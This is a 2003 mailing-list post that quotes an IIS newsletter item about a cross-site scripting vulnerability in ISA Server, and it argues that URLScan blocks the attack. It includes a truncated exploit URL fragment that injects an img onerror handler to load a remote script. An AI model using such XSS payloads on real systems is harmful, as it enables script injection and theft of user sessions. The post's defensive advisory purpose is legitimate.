Re: ISA Cross Scripting Vulnerability KB article

  • From: "cdawkins" <cdawkins@xxxxxxxxxxxxx>
  • To: isalist@xxxxxxxxxxxxx
  • Date: Sat, 19 Jul 2003 06:07:07 -0600

Here is a quote from an IIS newsletter I receive

<5> Cross scripting attack with ISA server easily defeated with URLScan

I want to point out a newly announced cross scripting attack that affects
ISA server. See http://www.pivx.com/larholm/adv/TL006/ for details. Notice
that the URL to implement the exploit is something like
"http://
<img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx2f

This is a serious vulnerability, but if URLScan is installed on the ISA
server, in most configurations, this URL would be rejected instead of
processed. Once again, URLScan proves itself as a strong defender of
future, unknown attacks.

